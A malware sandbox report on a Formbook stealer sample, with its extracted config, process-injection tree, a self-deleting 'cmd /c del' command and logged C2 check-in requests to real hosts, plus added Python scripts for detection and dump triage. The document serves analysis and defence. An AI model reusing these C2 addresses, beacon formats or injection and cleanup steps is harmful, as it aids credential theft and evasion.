
Analysis

  • max time kernel
    147s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    25/12/2024, 18:02 UTC

General

  • Target

    PRODUCT LIST.exe

  • Size

    592KB

  • MD5

    d403ceb699085cfd12ada96aa419a37b

  • SHA1

    8c9831b837374d718e24d35ec7e93f642a2b74ba

  • SHA256

    ac021bbe155b54ac93bd5ca40b6ca6130174d6d192c6fd2011e9677d56c09f4d

  • SHA512

    7c549efb3103fde42fe6cd46d6126846aa24afd29856bd59fcb5d66a0ae3854fc7d52902ddb8e7effac86929aa081c26a82e0b4ee1ce9c617919a5e774a10d68

  • SSDEEP

    12288:9NkLt1ac75ZalBvZ6sOEBb0OAZcELFacWHi+MnMVuL0477oaXnz61QIb:0tkCalCsOw0OACELwTC+TY0gz

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

r4gk

Decoy

quantalix.com

animalblog-eggs.com

039skz.xyz

guttas.net

lasantadayparty.com

protegerfinanceservices.com

vixtest.xyz

digitaleconomy.global

0xpax.xyz

mobilehome1688.com

themotionpartners.com

valueney.com

hattuafhv.quest

js0061gj.net

360metaverse.biz

seculardata.com

346727688.xyz

smartmapom.com

moksel.com

exoduswatchco.com

Signatures

  • Formbook

    Formbook is an information-stealing malware family sold as a service. It grabs data submitted in browser forms and credentials stored by browsers and mail clients, logs keystrokes and the clipboard, can take screenshots, and can download and run further payloads on instruction from its C2. It runs injected into explorer.exe and a system process rather than from its own dropper, which is why the process tree below shows explorer.exe and control.exe carrying the stealer behaviour.

  • Formbook family
  • Formbook payload 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe
      "C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:880
      • C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe
        "C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:3592
    • C:\Windows\SysWOW64\control.exe
      "C:\Windows\SysWOW64\control.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3836
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4596
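
The tree above is the standard Formbook chain: the dropper (PID 880) re-executes its own image and rewrites the child with SetThreadContext (PID 3592), the payload migrates into explorer.exe (PID 3436), explorer.exe then starts a 32-bit system binary (control.exe, PID 3836) that hosts the stealer, and that process deletes the original dropper through cmd.exe. The following script is an added example, not part of the tria.ge report: it reconstructs those three stages from process-creation telemetry. The ProcEvent schema and the EVENTS list are constructed from the report's tree and do not follow any real EDR or Sysmon field layout; the behaviour tags are taken from the signatures the report attached to each process.

```python
"""
Added example (not part of the tria.ge report): reconstruct the Formbook
execution chain shown in the process tree from process-creation telemetry.
The ProcEvent schema and EVENTS are constructed from the report's tree
(PIDs 3436, 880, 3592, 3836, 4596) and follow no real EDR field layout.
"""
import re
from dataclasses import dataclass, field

LOADER = r"C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                                # full path of the executed image
    cmdline: str
    flags: set = field(default_factory=set)   # API-usage tags the sandbox attached to the process


# Constructed from the report's process tree; flags mirror the listed signatures.
EVENTS = [
    ProcEvent(3436, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE",
              {"WriteProcessMemory"}),
    ProcEvent(880, 3436, LOADER, f'"{LOADER}"',
              {"SetThreadContext", "WriteProcessMemory"}),
    ProcEvent(3592, 880, LOADER, f'"{LOADER}"',
              {"SetThreadContext", "EnumeratesProcesses", "MapViewOfSection", "AdjustPrivilegeToken"}),
    ProcEvent(3836, 3436, r"C:\Windows\SysWOW64\control.exe", r'"C:\Windows\SysWOW64\control.exe"',
              {"SetThreadContext", "EnumeratesProcesses", "MapViewOfSection",
               "AdjustPrivilegeToken", "WriteProcessMemory"}),
    ProcEvent(4596, 3836, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{LOADER}"', set()),
]

# Constructed benign control: explorer.exe starting control.exe with no injection behaviour.
BENIGN = [
    ProcEvent(1000, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE", set()),
    ProcEvent(1001, 1000, r"C:\Windows\SysWOW64\control.exe", r'"C:\Windows\SysWOW64\control.exe"', set()),
]

DEL_RE = re.compile(r'/c\s+del\s+"?(?P<path>[^"]+)"?', re.IGNORECASE)


def find_formbook_chain(events):
    """Return (stage, pid, detail) tuples for each stage of the chain, stage 1 first."""
    by_pid = {e.pid: e for e in events}
    findings = []

    # Stage 1: the loader starts a second copy of its own image and rewrites it before
    # the first thread runs (SetThreadContext on the parent = process hollowing).
    hollowed = {}
    for e in events:
        p = by_pid.get(e.ppid)
        if p and e.image.lower() == p.image.lower() and "SetThreadContext" in p.flags:
            hollowed[e.image.lower()] = e.pid
            findings.append(("self-hollowing", e.pid, f"{p.pid} re-executed its own image into pid {e.pid}"))

    for e in events:
        p = by_pid.get(e.ppid)
        if p is None:
            continue
        # Stage 2: explorer.exe, not the user, launches a 32-bit system binary that itself
        # uses SetThreadContext: the payload has migrated into explorer and is hollowing a
        # system process to host the stealer.
        if (p.image.lower().endswith("\\explorer.exe") and "\\syswow64\\" in e.image.lower()
                and "SetThreadContext" in e.flags):
            findings.append(("explorer-spawn", e.pid, f"explorer.exe ({p.pid}) started {e.image}"))
        # Stage 3: cmd.exe /c del of the hollowed loader, launched from the injected system
        # process rather than from the dropper itself.
        m = DEL_RE.search(e.cmdline)
        if m and e.image.lower().endswith("\\cmd.exe") and m["path"].lower() in hollowed:
            findings.append(("cleanup", e.pid, f"{p.image} ({p.pid}) deleted hollowed loader {m['path']}"))
    return findings


if __name__ == "__main__":
    for stage, pid, detail in find_formbook_chain(EVENTS):
        print(f"{stage:15} pid={pid:<5} {detail}")
```

Each stage on its own is noisy (installers re-execute themselves, explorer.exe legitimately starts control.exe), so the value is in the combination: a process that hollowed its own image, a SysWOW64 binary started by explorer.exe that itself rewrites a thread context, and a cmd.exe deletion of exactly the hollowed image.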

Network

  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    4.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    81.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.144.22.2.in-addr.arpa
    IN PTR
    Response
    81.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-81.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    www.coachingwithkyle.com
    Remote address:
    8.8.8.8:53
    Request
    www.coachingwithkyle.com
    IN A
    Response
    www.coachingwithkyle.com
    IN A
    103.169.142.0
  • flag-au
    GET
    http://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf
    Explorer.EXE
    Remote address:
    103.169.142.0:80
    Request
    GET /r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf HTTP/1.1
    Host: www.coachingwithkyle.com
    Connection: close
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 25 Dec 2024 18:04:09 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Wed, 25 Dec 2024 19:04:09 GMT
    Location: https://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf
    Set-Cookie: __cf_bm=mcwuNAsu0h9TZMkNAMJm.2JapDIWY2d.cSn0OJomMug-1735149849-1.0.1.1-KPntSntEUrMoJ.FjSySDtoYFO0qICf13kMngV6zqkMb4hHWYM0Vrrdf59hk.DBe0VQ4kdcA7_WcmJmP4h3LQvw; path=/; expires=Wed, 25-Dec-24 18:34:09 GMT; domain=.www.coachingwithkyle.com; HttpOnly
    expect-ct: max-age=86400, enforce
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    referrer-policy: strict-origin-when-cross-origin
    Server: cloudflare
    CF-RAY: 8f7ac07f19a3cd85-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    0.142.169.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.142.169.103.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    www.thegisguru.com
    Remote address:
    8.8.8.8:53
    Request
    www.thegisguru.com
    IN A
    Response
    www.thegisguru.com
    IN CNAME
    traff-4.hugedomains.com
    traff-4.hugedomains.com
    IN CNAME
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    IN A
    3.94.41.167
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    IN A
    52.86.6.113
  • flag-us
    GET
    http://www.thegisguru.com/r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf
    Explorer.EXE
    Remote address:
    3.94.41.167:80
    Request
    GET /r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf HTTP/1.1
    Host: www.thegisguru.com
    Connection: close
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Dec 2024 18:04:25 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=thegisguru.com
    connection: close
  • flag-us
    DNS
    167.41.94.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.41.94.3.in-addr.arpa
    IN PTR
    Response
    167.41.94.3.in-addr.arpa
    IN PTR
    ec2-3-94-41-167.compute-1.amazonaws.com
  • flag-us
    DNS
    www.seculardata.com
    Remote address:
    8.8.8.8:53
    Request
    www.seculardata.com
    IN A
    Response
    www.seculardata.com
    IN CNAME
    seculardata.com
    seculardata.com
    IN A
    15.197.148.33
    seculardata.com
    IN A
    3.33.130.190
  • flag-us
    GET
    http://www.seculardata.com/r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf
    Explorer.EXE
    Remote address:
    15.197.148.33:80
    Request
    GET /r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf HTTP/1.1
    Host: www.seculardata.com
    Connection: close
    Response
    HTTP/1.1 200 OK
    content-type: text/html
    date: Wed, 25 Dec 2024 18:04:46 GMT
    content-length: 208
    connection: close
  • flag-us
    DNS
    33.148.197.15.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    33.148.197.15.in-addr.arpa
    IN PTR
    Response
    33.148.197.15.in-addr.arpa
    IN PTR
    a2aa9ff50de748dbe.awsglobalaccelerator.com
  • flag-us
    DNS
    15.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.upcxi.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.upcxi.xyz
    IN A
    Response
  • 103.169.142.0:80
    http://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf
    http
    Explorer.EXE
    405 B
    1.2kB
    5
    5

    HTTP Request

    GET http://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf

    HTTP Response

    301
  • 3.94.41.167:80
    http://www.thegisguru.com/r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf
    http
    Explorer.EXE
    399 B
    344 B
    5
    4

    HTTP Request

    GET http://www.thegisguru.com/r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf

    HTTP Response

    302
  • 15.197.148.33:80
    http://www.seculardata.com/r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf
    http
    Explorer.EXE
    446 B
    581 B
    6
    6

    HTTP Request

    GET http://www.seculardata.com/r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf

    HTTP Response

    200
  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    22.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    22.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    4.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    4.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    81.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    81.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    www.coachingwithkyle.com
    dns
    70 B
    86 B
    1
    1

    DNS Request

    www.coachingwithkyle.com

    DNS Response

    103.169.142.0

  • 8.8.8.8:53
    0.142.169.103.in-addr.arpa
    dns
    72 B
    160 B
    1
    1

    DNS Request

    0.142.169.103.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    www.thegisguru.com
    dns
    64 B
    194 B
    1
    1

    DNS Request

    www.thegisguru.com

    DNS Response

    3.94.41.167
    52.86.6.113

  • 8.8.8.8:53
    167.41.94.3.in-addr.arpa
    dns
    70 B
    123 B
    1
    1

    DNS Request

    167.41.94.3.in-addr.arpa

  • 8.8.8.8:53
    www.seculardata.com
    dns
    65 B
    111 B
    1
    1

    DNS Request

    www.seculardata.com

    DNS Response

    15.197.148.33
    3.33.130.190

  • 8.8.8.8:53
    33.148.197.15.in-addr.arpa
    dns
    72 B
    128 B
    1
    1

    DNS Request

    33.148.197.15.in-addr.arpa

  • 8.8.8.8:53
    15.173.189.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    15.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    www.upcxi.xyz
    dns
    59 B
    124 B
    1
    1

    DNS Request

    www.upcxi.xyz
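
All three GET requests above share one shape: a four-character campaign path (r4gk, matching the extracted config), one parameter carrying a long encoded blob that differs per host, and a second parameter whose value stays constant across hosts in the same run. Only www.seculardata.com (listed in the extracted config) answered 200; the other two were a Cloudflare redirect and a parked-domain redirect. The script below is an added example, not part of the tria.ge report: it recognises that URI shape, groups hits by bot so a run cycling through its candidate list shows up as one cluster, and separates hosts that actually answered from redirecting decoys. SAMPLE is constructed from the report's three requests plus one benign request, and BEACON_RE is an assumption about the URI shape, not a rule shipped by tria.ge.

```python
"""
Added example (not part of the tria.ge report): recognise Formbook-style HTTP
check-ins and cluster them by bot. SAMPLE is constructed from the report's three
GET requests plus one benign request; BEACON_RE is an assumed URI pattern.
"""
import re

# Assumed shape: GET /<4-char campaign>/?<param>=<long base64-like blob>&<param>=<bot id>
BEACON_RE = re.compile(
    r"^GET /(?P<campaign>[a-z0-9]{4})/\?"
    r"(?P<k1>[A-Za-z0-9]{2,16})=(?P<blob>[A-Za-z0-9+/=]{32,})"
    r"&(?P<k2>[A-Za-z0-9]{2,16})=(?P<bot>[A-Za-z0-9]{4,32}) HTTP/1\.[01]$"
)

# (Host header, request line, HTTP status) as seen in the report; last entry is a constructed benign request.
SAMPLE = [
    ("www.coachingwithkyle.com",
     "GET /r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf HTTP/1.1", 301),
    ("www.thegisguru.com",
     "GET /r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf HTTP/1.1", 302),
    ("www.seculardata.com",
     "GET /r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf HTTP/1.1", 200),
    ("www.example.com", "GET /search?q=formbook&lang=en HTTP/1.1", 200),
]


def parse_beacon(host, request_line):
    """Return the decoded fields of a matching check-in, or None for any other request."""
    m = BEACON_RE.match(request_line)
    if not m:
        return None
    return {"host": host, "campaign": m["campaign"], "params": (m["k1"], m["k2"]),
            "bot": m["bot"], "blob": m["blob"]}


def cluster_beacons(records):
    """Group hits by (campaign, parameter names, bot id).

    One infected host walks its candidate list with these held constant; only the
    blob and the Host header change, so the cluster reconstructs one bot's run.
    """
    clusters = {}
    for host, line, status in records:
        b = parse_beacon(host, line)
        if b:
            clusters.setdefault((b["campaign"], b["params"], b["bot"]), []).append((host, status))
    return clusters


def responding_hosts(clusters):
    """Hosts that answered 200: redirecting or parked decoys drop out, leaving the candidates worth escalating."""
    return sorted({host for hits in clusters.values() for host, status in hits if status == 200})


if __name__ == "__main__":
    clusters = cluster_beacons(SAMPLE)
    for key, hits in clusters.items():
        print("campaign", key[0], "bot", key[2], "->", [h for h, _ in hits])
    print("answered 200:", responding_hosts(clusters))
```

A 200 alone does not prove a live C2 (a parked page can answer 200 as well), so the result is a prioritisation, not a verdict; here it singles out the one host that is also in the extracted config. The block covers only the GET check-in shown in this report, not later exfiltration traffic.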

MITRE ATT&CK Enterprise v15


Downloads

  • memory/880-13-0x0000000074FE0000-0x0000000075790000-memory.dmp

    Filesize

    7.7MB

  • memory/880-0-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

    Filesize

    4KB

  • memory/880-2-0x0000000005D70000-0x0000000006314000-memory.dmp

    Filesize

    5.6MB

  • memory/880-3-0x00000000056F0000-0x0000000005782000-memory.dmp

    Filesize

    584KB

  • memory/880-4-0x00000000057D0000-0x00000000057DA000-memory.dmp

    Filesize

    40KB

  • memory/880-5-0x0000000074FE0000-0x0000000075790000-memory.dmp

    Filesize

    7.7MB

  • memory/880-10-0x0000000006720000-0x0000000006774000-memory.dmp

    Filesize

    336KB

  • memory/880-7-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

    Filesize

    4KB

  • memory/880-8-0x0000000074FE0000-0x0000000075790000-memory.dmp

    Filesize

    7.7MB

  • memory/880-9-0x0000000006520000-0x00000000065BC000-memory.dmp

    Filesize

    624KB

  • memory/880-1-0x0000000000C80000-0x0000000000D1A000-memory.dmp

    Filesize

    616KB

  • memory/880-6-0x0000000005C30000-0x0000000005C3C000-memory.dmp

    Filesize

    48KB

  • memory/3436-18-0x00000000025D0000-0x0000000002682000-memory.dmp

    Filesize

    712KB

  • memory/3436-22-0x00000000025D0000-0x0000000002682000-memory.dmp

    Filesize

    712KB

  • memory/3436-26-0x0000000002750000-0x0000000002826000-memory.dmp

    Filesize

    856KB

  • memory/3436-27-0x0000000002750000-0x0000000002826000-memory.dmp

    Filesize

    856KB

  • memory/3436-29-0x0000000002750000-0x0000000002826000-memory.dmp

    Filesize

    856KB

  • memory/3592-14-0x0000000000F70000-0x00000000012BA000-memory.dmp

    Filesize

    3.3MB

  • memory/3592-17-0x0000000000F20000-0x0000000000F34000-memory.dmp

    Filesize

    80KB

  • memory/3592-16-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/3592-11-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/3836-20-0x0000000000BE0000-0x0000000000C07000-memory.dmp

    Filesize

    156KB

  • memory/3836-19-0x0000000000BE0000-0x0000000000C07000-memory.dmp

    Filesize

    156KB

  • memory/3836-21-0x0000000000D80000-0x0000000000DAF000-memory.dmp

    Filesize

    188KB
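
Each dump name encodes the PID, a sequence number and the start and end address of the region, so the list can be triaged without opening a single file. Two things stand out: a 188KB region at 0x400000 in the hollowed child (PID 3592) and a region of exactly the same size at 0xD80000 in control.exe (PID 3836), which is where the unpacked Formbook payload is likely to be found in both processes. The script below is an added example, not part of the tria.ge report: it parses the names, checks the displayed sizes against the encoded bounds, finds region sizes that recur across PIDs and lists regions at the 32-bit default image base. DUMPS is constructed from the Downloads list above (every PID 3436, 3592 and 3836 entry plus three from PID 880); the heuristics are assumptions.

```python
"""
Added example (not part of the tria.ge report): triage the exported memory dumps
from their file names alone. DUMPS is constructed from the report's Downloads
list; the size-matching and image-base heuristics are assumptions.
"""
import re

DUMP_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# (file name, size the report displays)
DUMPS = [
    ("memory/880-1-0x0000000000C80000-0x0000000000D1A000-memory.dmp", "616KB"),
    ("memory/880-3-0x00000000056F0000-0x0000000005782000-memory.dmp", "584KB"),
    ("memory/880-13-0x0000000074FE0000-0x0000000075790000-memory.dmp", "7.7MB"),
    ("memory/3436-18-0x00000000025D0000-0x0000000002682000-memory.dmp", "712KB"),
    ("memory/3436-26-0x0000000002750000-0x0000000002826000-memory.dmp", "856KB"),
    ("memory/3592-11-0x0000000000400000-0x000000000042F000-memory.dmp", "188KB"),
    ("memory/3592-14-0x0000000000F70000-0x00000000012BA000-memory.dmp", "3.3MB"),
    ("memory/3592-17-0x0000000000F20000-0x0000000000F34000-memory.dmp", "80KB"),
    ("memory/3836-19-0x0000000000BE0000-0x0000000000C07000-memory.dmp", "156KB"),
    ("memory/3836-21-0x0000000000D80000-0x0000000000DAF000-memory.dmp", "188KB"),
]


def parse_dump(name):
    """Split a dump name into pid, sequence number, region bounds and byte size."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a tria.ge dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "seq": int(m["seq"]), "start": start, "end": end, "size": end - start}


def human_size(n):
    """Mirror the report's display: whole KiB below 1 MiB, one decimal MiB above."""
    return f"{n / 2**20:.1f}MB" if n >= 2**20 else f"{n // 1024}KB"


def check_sizes(dumps):
    """Names whose displayed size disagrees with the bounds encoded in the name (expected: none)."""
    return [name for name, shown in dumps if human_size(parse_dump(name)["size"]) != shown]


def shared_regions(dumps):
    """Region sizes dumped from more than one PID.

    An identically sized region in the hollowed child and in the later-injected
    system process is the strongest hint for where the unpacked payload lives.
    """
    pids_by_size = {}
    for name, _ in dumps:
        r = parse_dump(name)
        pids_by_size.setdefault(r["size"], set()).add(r["pid"])
    return {size: pids for size, pids in pids_by_size.items() if len(pids) > 1}


def payload_candidates(dumps, default_base=0x400000):
    """Regions mapped at the classic 32-bit default image base, where a hollowed
    process ends up when the replacement PE is mapped at its preferred address."""
    return [name for name, _ in dumps if parse_dump(name)["start"] == default_base]


if __name__ == "__main__":
    print("size mismatches:", check_sizes(DUMPS))
    for size, pids in shared_regions(DUMPS).items():
        print(f"{human_size(size)} region present in PIDs {sorted(pids)}")
    print("at default image base:", payload_candidates(DUMPS))
```

Both heuristics point at the same pair of dumps here (3592-11 and 3836-21), which is the place to start when extracting the payload for static analysis or for checking the config extractor's output; neither rule is proof on its own, since a benign DLL mapped in two processes also satisfies the size match.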
